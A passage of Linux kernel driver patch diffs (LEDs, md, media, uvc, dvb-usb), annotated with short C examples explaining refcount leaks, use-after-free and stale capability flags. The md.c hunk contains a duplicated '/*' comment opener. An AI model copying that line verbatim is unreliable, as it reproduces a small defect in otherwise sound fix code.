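            int saved_len;

            if (!f)
                    return 1;
            f->len = 128;

            /* Cache everything still needed *before* freeing; reading
             * f->len after free(f) is a use-after-free even when it
             * appears to work (KASAN/ASan flag exactly this). */
            saved_len = f->len;
            free(f);

            printf("previous frame length: %d\n", saved_len);
            return 0;
    }
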
+diff --git a/drivers/leds/flash/leds-mt6360.c b/drivers/leds/flash/leds-mt6360.c
+index e1066a52d2d21..2fab335a64252 100644
+--- a/drivers/leds/flash/leds-mt6360.c
++++ b/drivers/leds/flash/leds-mt6360.c
+@@ -637,14 +637,17 @@ static int mt6360_init_isnk_properties(struct mt6360_led *led,
+ 
+ 			ret = fwnode_property_read_u32(child, "reg", &reg);
+ 			if (ret || reg > MT6360_LED_ISNK3 ||
+-			    priv->leds_active & BIT(reg))
++			    priv->leds_active & BIT(reg)) {
++				fwnode_handle_put(child);
+ 				return -EINVAL;
++			}
+ 
+ 			ret = fwnode_property_read_u32(child, "color", &color);
+ 			if (ret) {
+ 				dev_err(priv->dev,
+ 					"led %d, no color specified\n",
+ 					led->led_no);
++				fwnode_handle_put(child);
+ 				return ret;
+ 			}
+ 
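
Both early returns added to the mt6360 loop now drop the reference that the child-node iterator took; without them, every error exit leaked one fwnode refcount. The problem's shape, sketched with a plain counter in place of the kernel's fwnode get/put:

    #include <stdio.h>

    static int refs;

    static void get_node(void) { refs++; }
    static void put_node(void) { refs--; }

    /* Iterators like fwnode_for_each_child_node() hold a reference on
     * the current child; only the loop's own advance drops it, so a
     * 'return' from the body must put the reference explicitly. */
    static int scan(int fail_at)
    {
            int i;

            for (i = 0; i < 3; i++) {
                    get_node();
                    if (i == fail_at) {
                            put_node();    /* the fix: release first */
                            return -1;
                    }
                    put_node();            /* normal loop advance */
            }
            return 0;
    }

    int main(void)
    {
            scan(1);
            printf("leaked refs: %d\n", refs);    /* 0 with the fix */
            return 0;
    }
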
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index aa39b2a48fdff..7391d2cf1370a 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,7 +235,6 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
+-	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/leds/led-triggers.c b/drivers/leds/led-triggers.c
+index 072491d3e17b0..024b73f84ce0c 100644
+--- a/drivers/leds/led-triggers.c
++++ b/drivers/leds/led-triggers.c
+@@ -179,9 +179,9 @@ int led_trigger_set(struct led_classdev *led_cdev, struct led_trigger *trig)
+ 
+ 		cancel_work_sync(&led_cdev->set_brightness_work);
+ 		led_stop_software_blink(led_cdev);
++		device_remove_groups(led_cdev->dev, led_cdev->trigger->groups);
+ 		if (led_cdev->trigger->deactivate)
+ 			led_cdev->trigger->deactivate(led_cdev);
+-		device_remove_groups(led_cdev->dev, led_cdev->trigger->groups);
+ 		led_cdev->trigger = NULL;
+ 		led_cdev->trigger_data = NULL;
+ 		led_cdev->activated = false;
+diff --git a/drivers/leds/leds-ss4200.c b/drivers/leds/leds-ss4200.c
+index fcaa34706b6ca..2ef9fc7371bd1 100644
+--- a/drivers/leds/leds-ss4200.c
++++ b/drivers/leds/leds-ss4200.c
+@@ -356,8 +356,10 @@ static int ich7_lpc_probe(struct pci_dev *dev,
+ 
+ 	nas_gpio_pci_dev = dev;
+ 	status = pci_read_config_dword(dev, PMBASE, &g_pm_io_base);
+-	if (status)
++	if (status) {
++		status = pcibios_err_to_errno(status);
+ 		goto out;
++	}
+ 	g_pm_io_base &= 0x00000ff80;
+ 
+ 	status = pci_read_config_dword(dev, GPIO_CTRL, &gc);
+@@ -369,8 +371,9 @@ static int ich7_lpc_probe(struct pci_dev *dev,
+ 	}
+ 
+ 	status = pci_read_config_dword(dev, GPIO_BASE, &nas_gpio_io_base);
+-	if (0 > status) {
++	if (status) {
+ 		dev_info(&dev->dev, "Unable to read GPIOBASE.\n");
++		status = pcibios_err_to_errno(status);
+ 		goto out;
+ 	}
+ 	dev_dbg(&dev->dev, ": GPIOBASE = 0x%08x\n", nas_gpio_io_base);
+diff --git a/drivers/macintosh/therm_windtunnel.c b/drivers/macintosh/therm_windtunnel.c
+index b8228ca404544..ab9b381c8ff11 100644
+--- a/drivers/macintosh/therm_windtunnel.c
++++ b/drivers/macintosh/therm_windtunnel.c
+@@ -548,7 +548,7 @@ g4fan_exit( void )
+ 	platform_driver_unregister( &therm_of_driver );
+ 
+ 	if( x.of_dev )
+-		of_device_unregister( x.of_dev );
++		of_platform_device_destroy(&x.of_dev->dev, NULL);
+ }
+ 
+ module_init(g4fan_init);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 6a707b41dc865..52585e2c61aa4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -1496,14 +1496,6 @@ static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	return r;
+ }
+ 
+-/*
+- * Check whether a DM target is a verity target.
+- */
+-bool dm_is_verity_target(struct dm_target *ti)
+-{
+-	return ti->type->module == THIS_MODULE;
+-}
+-
+ /*
+  * Get the verity mode (error behavior) of a verity target.
+  *
+@@ -1575,6 +1567,14 @@ static void __exit dm_verity_exit(void)
+ module_init(dm_verity_init);
+ module_exit(dm_verity_exit);
+ 
++/*
++ * Check whether a DM target is a verity target.
++ */
++bool dm_is_verity_target(struct dm_target *ti)
++{
++	return ti->type == &verity_target;
++}
++
+ MODULE_AUTHOR("Mikulas Patocka <mpatocka@redhat.com>");
+ MODULE_AUTHOR("Mandeep Baines <msb@chromium.org>");
+ MODULE_AUTHOR("Will Drewry <wad@chromium.org>");
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 506c998c0ca59..7dc1c42accccd 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -527,13 +527,9 @@ static void md_end_flush(struct bio *bio)
+ 
+ 	rdev_dec_pending(rdev, mddev);
+ 
+-	if (atomic_dec_and_test(&mddev->flush_pending)) {
+-		/* The pair is percpu_ref_get() from md_flush_request() */
+-		percpu_ref_put(&mddev->active_io);
+-
++	if (atomic_dec_and_test(&mddev->flush_pending))
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+-	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws);
+@@ -564,12 +560,8 @@ static void submit_flushes(struct work_struct *ws)
+ 			rcu_read_lock();
+ 		}
+ 	rcu_read_unlock();
+-	if (atomic_dec_and_test(&mddev->flush_pending)) {
+-		/* The pair is percpu_ref_get() from md_flush_request() */
+-		percpu_ref_put(&mddev->active_io);
+-
++	if (atomic_dec_and_test(&mddev->flush_pending))
+ 		queue_work(md_wq, &mddev->flush_work);
+-	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws)
+@@ -594,8 +586,20 @@ static void md_submit_flush_data(struct work_struct *ws)
+ 		bio_endio(bio);
+ 	} else {
+ 		bio->bi_opf &= ~REQ_PREFLUSH;
+-		md_handle_request(mddev, bio);
++
++		/*
++		/*
++		 * make_request() will never return an error here: it only
++		 * returns an error from raid5_make_request() when used by
++		 * dm-raid, and since dm always splits data and flush
++		 * operations into two separate ios, the flush io submitted
++		 * by dm always has size 0, so that path is never taken here.
++		 */
++		if (WARN_ON_ONCE(!mddev->pers->make_request(mddev, bio)))
++			bio_io_error(bio);
+ 	}
++
++	/* The pair is percpu_ref_get() from md_flush_request() */
++	percpu_ref_put(&mddev->active_io);
+ }
+ 
+ /*
+diff --git a/drivers/media/i2c/imx412.c b/drivers/media/i2c/imx412.c
+index 7f6d29e0e7c40..77fa6253ba3e3 100644
+--- a/drivers/media/i2c/imx412.c
++++ b/drivers/media/i2c/imx412.c
+@@ -544,14 +544,13 @@ static int imx412_update_controls(struct imx412 *imx412,
+  */
+ static int imx412_update_exp_gain(struct imx412 *imx412, u32 exposure, u32 gain)
+ {
+-	u32 lpfr, shutter;
++	u32 lpfr;
+ 	int ret;
+ 
+ 	lpfr = imx412->vblank + imx412->cur_mode->height;
+-	shutter = lpfr - exposure;
+ 
+-	dev_dbg(imx412->dev, "Set exp %u, analog gain %u, shutter %u, lpfr %u",
+-		exposure, gain, shutter, lpfr);
++	dev_dbg(imx412->dev, "Set exp %u, analog gain %u, lpfr %u",
++		exposure, gain, lpfr);
+ 
+ 	ret = imx412_write_reg(imx412, IMX412_REG_HOLD, 1, 1);
+ 	if (ret)
+@@ -561,7 +560,7 @@ static int imx412_update_exp_gain(struct imx412 *imx412, u32 exposure, u32 gain)
+ 	if (ret)
+ 		goto error_release_group_hold;
+ 
+-	ret = imx412_write_reg(imx412, IMX412_REG_EXPOSURE_CIT, 2, shutter);
++	ret = imx412_write_reg(imx412, IMX412_REG_EXPOSURE_CIT, 2, exposure);
+ 	if (ret)
+ 		goto error_release_group_hold;
+ 
+diff --git a/drivers/media/pci/ivtv/ivtv-udma.c b/drivers/media/pci/ivtv/ivtv-udma.c
+index 210be8290f24d..fd76f88975ae3 100644
+--- a/drivers/media/pci/ivtv/ivtv-udma.c
++++ b/drivers/media/pci/ivtv/ivtv-udma.c
+@@ -131,6 +131,8 @@ int ivtv_udma_setup(struct ivtv *itv, unsigned long ivtv_dest_addr,
+ 
+ 	/* Fill SG List with new values */
+ 	if (ivtv_udma_fill_sg_list(dma, &user_dma, 0) < 0) {
++		IVTV_DEBUG_WARN("%s: could not allocate bounce buffers for highmem userspace buffers\n",
++				__func__);
+ 		unpin_user_pages(dma->map, dma->page_count);
+ 		dma->page_count = 0;
+ 		return -ENOMEM;
+@@ -139,6 +141,12 @@ int ivtv_udma_setup(struct ivtv *itv, unsigned long ivtv_dest_addr,
+ 	/* Map SG List */
+ 	dma->SG_length = dma_map_sg(&itv->pdev->dev, dma->SGlist,
+ 				    dma->page_count, DMA_TO_DEVICE);
++	if (!dma->SG_length) {
++		IVTV_DEBUG_WARN("%s: DMA map error, SG_length is 0\n", __func__);
++		unpin_user_pages(dma->map, dma->page_count);
++		dma->page_count = 0;
++		return -EINVAL;
++	}
+ 
+ 	/* Fill SG Array with new values */
+ 	ivtv_udma_fill_sg_array (dma, ivtv_dest_addr, 0, -1);
+diff --git a/drivers/media/pci/ivtv/ivtv-yuv.c b/drivers/media/pci/ivtv/ivtv-yuv.c
+index 4ba10c34a16a4..bd0b80331602d 100644
+--- a/drivers/media/pci/ivtv/ivtv-yuv.c
++++ b/drivers/media/pci/ivtv/ivtv-yuv.c
+@@ -115,6 +115,12 @@ static int ivtv_yuv_prep_user_dma(struct ivtv *itv, struct ivtv_user_dma *dma,
+ 	}
+ 	dma->SG_length = dma_map_sg(&itv->pdev->dev, dma->SGlist,
+ 				    dma->page_count, DMA_TO_DEVICE);
++	if (!dma->SG_length) {
++		IVTV_DEBUG_WARN("%s: DMA map error, SG_length is 0\n", __func__);
++		unpin_user_pages(dma->map, dma->page_count);
++		dma->page_count = 0;
++		return -EINVAL;
++	}
+ 
+ 	/* Fill SG Array with new values */
+ 	ivtv_udma_fill_sg_array(dma, y_buffer_offset, uv_buffer_offset, y_size);
+diff --git a/drivers/media/pci/ivtv/ivtvfb.c b/drivers/media/pci/ivtv/ivtvfb.c
+index 00ac94d4ab19d..a642becdc0d73 100644
+--- a/drivers/media/pci/ivtv/ivtvfb.c
++++ b/drivers/media/pci/ivtv/ivtvfb.c
+@@ -281,10 +281,10 @@ static int ivtvfb_prep_dec_dma_to_device(struct ivtv *itv,
+ 	/* Map User DMA */
+ 	if (ivtv_udma_setup(itv, ivtv_dest_addr, userbuf, size_in_bytes) <= 0) {
+ 		mutex_unlock(&itv->udma.lock);
+-		IVTVFB_WARN("ivtvfb_prep_dec_dma_to_device, Error with pin_user_pages: %d bytes, %d pages returned\n",
+-			       size_in_bytes, itv->udma.page_count);
++		IVTVFB_WARN("%s, Error in ivtv_udma_setup: %d bytes, %d pages returned\n",
++			       __func__, size_in_bytes, itv->udma.page_count);
+ 
+-		/* pin_user_pages must have failed completely */
++		/* pin_user_pages or DMA must have failed completely */
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-dvb.c b/drivers/media/pci/saa7134/saa7134-dvb.c
+index 9c6cfef03331d..a66df6adfaad8 100644
+--- a/drivers/media/pci/saa7134/saa7134-dvb.c
++++ b/drivers/media/pci/saa7134/saa7134-dvb.c
+@@ -466,7 +466,9 @@ static int philips_europa_tuner_sleep(struct dvb_frontend *fe)
+ 	/* switch the board to analog mode */
+ 	if (fe->ops.i2c_gate_ctrl)
+ 		fe->ops.i2c_gate_ctrl(fe, 1);
+-	i2c_transfer(&dev->i2c_adap, &analog_msg, 1);
++	if (i2c_transfer(&dev->i2c_adap, &analog_msg, 1) != 1)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+@@ -1018,7 +1020,9 @@ static int md8800_set_voltage2(struct dvb_frontend *fe,
+ 	else
+ 		wbuf[1] = rbuf & 0xef;
+ 	msg[0].len = 2;
+-	i2c_transfer(&dev->i2c_adap, msg, 1);
++	if (i2c_transfer(&dev->i2c_adap, msg, 1) != 1)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 1a52c2ea2da5b..7ea976efc0242 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -1221,7 +1221,7 @@ static int vdec_stop_output(struct venus_inst *inst)
+ 		break;
+ 	case VENUS_DEC_STATE_INIT:
+ 	case VENUS_DEC_STATE_CAPTURE_SETUP:
+-		ret = hfi_session_flush(inst, HFI_FLUSH_INPUT, true);
++		ret = hfi_session_flush(inst, HFI_FLUSH_ALL, true);
+ 		break;
+ 	default:
+ 		break;
+@@ -1705,6 +1705,7 @@ static int vdec_close(struct file *file)
+ 
+ 	vdec_pm_get(inst);
+ 
++	cancel_work_sync(&inst->delayed_process_work);
+ 	v4l2_m2m_ctx_release(inst->m2m_ctx);
+ 	v4l2_m2m_release(inst->m2m_dev);
+ 	vdec_ctrl_deinit(inst);
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c b/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
+index 174aa6176f540..3b6657d4877a5 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-csi2.c
+@@ -1559,12 +1559,14 @@ static int rcsi2_probe(struct platform_device *pdev)
+ 
+ 	ret = v4l2_async_register_subdev(&priv->subdev);
+ 	if (ret < 0)
+-		goto error_async;
++		goto error_pm_runtime;
+ 
+ 	dev_info(priv->dev, "%d lanes found\n", priv->lanes);
+ 
+ 	return 0;
+ 
++error_pm_runtime:
++	pm_runtime_disable(&pdev->dev);
+ error_async:
+ 	v4l2_async_nf_unregister(&priv->notifier);
+ 	v4l2_async_nf_cleanup(&priv->notifier);
+@@ -1581,6 +1583,7 @@ static int rcsi2_remove(struct platform_device *pdev)
+ 	v4l2_async_nf_unregister(&priv->notifier);
+ 	v4l2_async_nf_cleanup(&priv->notifier);
+ 	v4l2_async_unregister_subdev(&priv->subdev);
++	v4l2_subdev_cleanup(&priv->subdev);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+index ef5adffae1972..8bfb020b2f260 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+@@ -665,12 +665,22 @@ static int rvin_setup(struct rvin_dev *vin)
+ 	 */
+ 	switch (vin->mbus_code) {
+ 	case MEDIA_BUS_FMT_YUYV8_1X16:
+-		/* BT.601/BT.1358 16bit YCbCr422 */
+-		vnmc |= VNMC_INF_YUV16;
++		if (vin->is_csi)
++			/* YCbCr422 8-bit */
++			vnmc |= VNMC_INF_YUV8_BT601;
++		else
++			/* BT.601/BT.1358 16bit YCbCr422 */
++			vnmc |= VNMC_INF_YUV16;
+ 		input_is_yuv = true;
+ 		break;
+ 	case MEDIA_BUS_FMT_UYVY8_1X16:
+-		vnmc |= VNMC_INF_YUV16 | VNMC_YCAL;
++		if (vin->is_csi)
++			/* YCbCr422 8-bit */
++			vnmc |= VNMC_INF_YUV8_BT601;
++		else
++			/* BT.601/BT.1358 16bit YCbCr422 */
++			vnmc |= VNMC_INF_YUV16;
++		vnmc |= VNMC_YCAL;
+ 		input_is_yuv = true;
+ 		break;
+ 	case MEDIA_BUS_FMT_UYVY8_2X8:
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_histo.c b/drivers/media/platform/renesas/vsp1/vsp1_histo.c
+index f22449dd654cb..c0f1002f4ecf1 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_histo.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_histo.c
+@@ -36,9 +36,8 @@ struct vsp1_histogram_buffer *
+ vsp1_histogram_buffer_get(struct vsp1_histogram *histo)
+ {
+ 	struct vsp1_histogram_buffer *buf = NULL;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock(&histo->irqlock);
+ 
+ 	if (list_empty(&histo->irqqueue))
+ 		goto done;
+@@ -49,7 +48,7 @@ vsp1_histogram_buffer_get(struct vsp1_histogram *histo)
+ 	histo->readout = true;
+ 
+ done:
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock(&histo->irqlock);
+ 	return buf;
+ }
+ 
+@@ -58,7 +57,6 @@ void vsp1_histogram_buffer_complete(struct vsp1_histogram *histo,
+ 				    size_t size)
+ {
+ 	struct vsp1_pipeline *pipe = histo->entity.pipe;
+-	unsigned long flags;
+ 
+ 	/*
+ 	 * The pipeline pointer is guaranteed to be valid as this function is
+@@ -70,10 +68,10 @@ void vsp1_histogram_buffer_complete(struct vsp1_histogram *histo,
+ 	vb2_set_plane_payload(&buf->buf.vb2_buf, 0, size);
+ 	vb2_buffer_done(&buf->buf.vb2_buf, VB2_BUF_STATE_DONE);
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock(&histo->irqlock);
+ 	histo->readout = false;
+ 	wake_up(&histo->wait_queue);
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock(&histo->irqlock);
+ }
+ 
+ /* -----------------------------------------------------------------------------
+@@ -124,11 +122,10 @@ static void histo_buffer_queue(struct vb2_buffer *vb)
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct vsp1_histogram *histo = vb2_get_drv_priv(vb->vb2_queue);
+ 	struct vsp1_histogram_buffer *buf = to_vsp1_histogram_buffer(vbuf);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock_irq(&histo->irqlock);
+ 	list_add_tail(&buf->queue, &histo->irqqueue);
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock_irq(&histo->irqlock);
+ }
+ 
+ static int histo_start_streaming(struct vb2_queue *vq, unsigned int count)
+@@ -140,9 +137,8 @@ static void histo_stop_streaming(struct vb2_queue *vq)
+ {
+ 	struct vsp1_histogram *histo = vb2_get_drv_priv(vq);
+ 	struct vsp1_histogram_buffer *buffer;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&histo->irqlock, flags);
++	spin_lock_irq(&histo->irqlock);
+ 
+ 	/* Remove all buffers from the IRQ queue. */
+ 	list_for_each_entry(buffer, &histo->irqqueue, queue)
+@@ -152,7 +148,7 @@ static void histo_stop_streaming(struct vb2_queue *vq)
+ 	/* Wait for the buffer being read out (if any) to complete. */
+ 	wait_event_lock_irq(histo->wait_queue, !histo->readout, histo->irqlock);
+ 
+-	spin_unlock_irqrestore(&histo->irqlock, flags);
++	spin_unlock_irq(&histo->irqlock);
+ }
+ 
+ static const struct vb2_ops histo_video_queue_qops = {
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_pipe.h b/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
+index ae646c9ef3373..15daf35bda216 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
++++ b/drivers/media/platform/renesas/vsp1/vsp1_pipe.h
+@@ -73,7 +73,7 @@ struct vsp1_partition_window {
+  * @wpf: The WPF partition window configuration
+  */
+ struct vsp1_partition {
+-	struct vsp1_partition_window rpf;
++	struct vsp1_partition_window rpf[VSP1_MAX_RPF];
+ 	struct vsp1_partition_window uds_sink;
+ 	struct vsp1_partition_window uds_source;
+ 	struct vsp1_partition_window sru;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_rpf.c b/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
+index 75083cb234fe3..996a3058d5b76 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_rpf.c
+@@ -271,8 +271,8 @@ static void rpf_configure_partition(struct vsp1_entity *entity,
+ 	 * 'width' need to be adjusted.
+ 	 */
+ 	if (pipe->partitions > 1) {
+-		crop.width = pipe->partition->rpf.width;
+-		crop.left += pipe->partition->rpf.left;
++		crop.width = pipe->partition->rpf[rpf->entity.index].width;
++		crop.left += pipe->partition->rpf[rpf->entity.index].left;
+ 	}
+ 
+ 	if (pipe->interlaced) {
+@@ -327,7 +327,9 @@ static void rpf_partition(struct vsp1_entity *entity,
+ 			  unsigned int partition_idx,
+ 			  struct vsp1_partition_window *window)
+ {
+-	partition->rpf = *window;
++	struct vsp1_rwpf *rpf = to_rwpf(&entity->subdev);
++
++	partition->rpf[rpf->entity.index] = *window;
+ }
+ 
+ static const struct vsp1_entity_operations rpf_entity_ops = {
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 5719dda6e0f0e..e5590a708f1c5 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -1148,10 +1148,7 @@ static int imon_ir_change_protocol(struct rc_dev *rc, u64 *rc_proto)
+ 
+ 	memcpy(ictx->usb_tx_buf, &ir_proto_packet, sizeof(ir_proto_packet));
+ 
+-	if (!mutex_is_locked(&ictx->lock)) {
+-		unlock = true;
+-		mutex_lock(&ictx->lock);
+-	}
++	unlock = mutex_trylock(&ictx->lock);
+ 
+ 	retval = send_packet(ictx);
+ 	if (retval)
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index adb8c794a2d7b..d9a9017b96eaa 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -828,8 +828,10 @@ struct rc_dev *rc_dev_get_from_fd(int fd, bool write)
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	if (write && !(f.file->f_mode & FMODE_WRITE))
++	if (write && !(f.file->f_mode & FMODE_WRITE)) {
++		fdput(f);
+ 		return ERR_PTR(-EPERM);
++	}
+ 
+ 	fh = f.file->private_data;
+ 	dev = fh->rc;
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 58eea8ab54779..6cf6d08cc4ec9 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -23,11 +23,40 @@ static int dvb_usb_force_pid_filter_usage;
+ module_param_named(force_pid_filter_usage, dvb_usb_force_pid_filter_usage, int, 0444);
+ MODULE_PARM_DESC(force_pid_filter_usage, "force all dvb-usb-devices to use a PID filter, if any (default: 0).");
+ 
++static int dvb_usb_check_bulk_endpoint(struct dvb_usb_device *d, u8 endpoint)
++{
++	if (endpoint) {
++		int ret;
++
++		ret = usb_pipe_type_check(d->udev, usb_sndbulkpipe(d->udev, endpoint));
++		if (ret)
++			return ret;
++		ret = usb_pipe_type_check(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
++		if (ret)
++			return ret;
++	}
++	return 0;
++}
++
++static void dvb_usb_clear_halt(struct dvb_usb_device *d, u8 endpoint)
++{
++	if (endpoint) {
++		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, endpoint));
++		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
++	}
++}
++
+ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ {
+ 	struct dvb_usb_adapter *adap;
+ 	int ret, n, o;
+ 
++	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint);
++	if (ret)
++		return ret;
++	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint_response);
++	if (ret)
++		return ret;
+ 	for (n = 0; n < d->props.num_adapters; n++) {
+ 		adap = &d->adapter[n];
+ 		adap->dev = d;
+@@ -103,10 +132,8 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 	 * when reloading the driver w/o replugging the device
+ 	 * sometimes a timeout occurs, this helps
+ 	 */
+-	if (d->props.generic_bulk_ctrl_endpoint != 0) {
+-		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
+-		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
+-	}
++	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint);
++	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint_response);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 6d7535efc09de..dffc9d03235c4 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -1959,7 +1959,13 @@ static int uvc_ctrl_get_flags(struct uvc_device *dev,
+ 	else
+ 		ret = uvc_query_ctrl(dev, UVC_GET_INFO, ctrl->entity->id,
+ 				     dev->intfnum, info->selector, data, 1);
+-	if (!ret)
++
++	if (!ret) {
++		info->flags &= ~(UVC_CTRL_FLAG_GET_CUR |
++				 UVC_CTRL_FLAG_SET_CUR |
++				 UVC_CTRL_FLAG_AUTO_UPDATE |
++				 UVC_CTRL_FLAG_ASYNCHRONOUS);
++
+ 		info->flags |= (data[0] & UVC_CONTROL_CAP_GET ?
+ 				UVC_CTRL_FLAG_GET_CUR : 0)
+ 			    |  (data[0] & UVC_CONTROL_CAP_SET ?
+@@ -1968,6 +1974,7 @@ static int uvc_ctrl_get_flags(struct uvc_device *dev,
+ 				UVC_CTRL_FLAG_AUTO_UPDATE : 0)
+ 			    |  (data[0] & UVC_CONTROL_CAP_ASYNCHRONOUS ?
+ 				UVC_CTRL_FLAG_ASYNCHRONOUS : 0);
++	}
+ 
+ 	kfree(data);
+ 	return ret;
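
The clearing step above is what keeps a re-query honest: previously the function could only ever OR bits in, so a control whose capabilities shrank between queries kept stale GET_CUR/SET_CUR flags forever. The clear-then-set idiom in isolation:

    #include <stdint.h>
    #include <stdio.h>

    #define FLAG_GET_CUR (1u << 0)
    #define FLAG_SET_CUR (1u << 1)
    #define FLAG_AUTO    (1u << 2)

    static void update_flags(uint32_t *flags, uint8_t caps)
    {
            /* Drop the previously cached capability bits first ... */
            *flags &= ~(FLAG_GET_CUR | FLAG_SET_CUR | FLAG_AUTO);
            /* ... then repopulate from the fresh query so bits the
             * device no longer reports cannot linger. */
            *flags |= (caps & 0x1 ? FLAG_GET_CUR : 0) |
                      (caps & 0x2 ? FLAG_SET_CUR : 0) |
                      (caps & 0x4 ? FLAG_AUTO : 0);
    }

    int main(void)
    {
            uint32_t flags = FLAG_GET_CUR | FLAG_SET_CUR;

            update_flags(&flags, 0x1);    /* device now reports GET only */
            printf("flags=%#x\n", flags); /* 0x1 -- SET_CUR is gone */
            return 0;
    }
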
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index 0d3a3b697b2d8..a5ad3ff8bdbb9 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -705,11 +705,11 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	unsigned long flags;
+ 	u64 timestamp;
+ 	u32 delta_stc;
+-	u32 y1, y2;
++	u32 y1;
+ 	u32 x1, x2;
+ 	u32 mean;
+ 	u32 sof;
+-	u64 y;
++	u64 y, y2;
+ 
+ 	if (!uvc_hw_timestamps_param)
+ 		return;
+@@ -749,7 +749,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	sof = y;
+ 
+ 	uvc_dbg(stream->dev, CLOCK,
+-		"%s: PTS %u y %llu.%06llu SOF %u.%06llu (x1 %u x2 %u y1 %u y2 %u SOF offset %u)\n",
++		"%s: PTS %u y %llu.%06llu SOF %u.%06llu (x1 %u x2 %u y1 %u y2 %llu SOF offset %u)\n",
+ 		stream->dev->name, buf->pts,
+ 		y >> 16, div_u64((y & 0xffff) * 1000000, 65536),
+ 		sof >> 16, div_u64(((u64)sof & 0xffff) * 1000000LLU, 65536),
+@@ -764,7 +764,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 		goto done;
+ 
+ 	y1 = NSEC_PER_SEC;
+-	y2 = (u32)ktime_to_ns(ktime_sub(last->host_time, first->host_time)) + y1;
++	y2 = ktime_to_ns(ktime_sub(last->host_time, first->host_time)) + y1;
+ 
+ 	/*
+ 	 * Interpolated and host SOF timestamps can wrap around at slightly
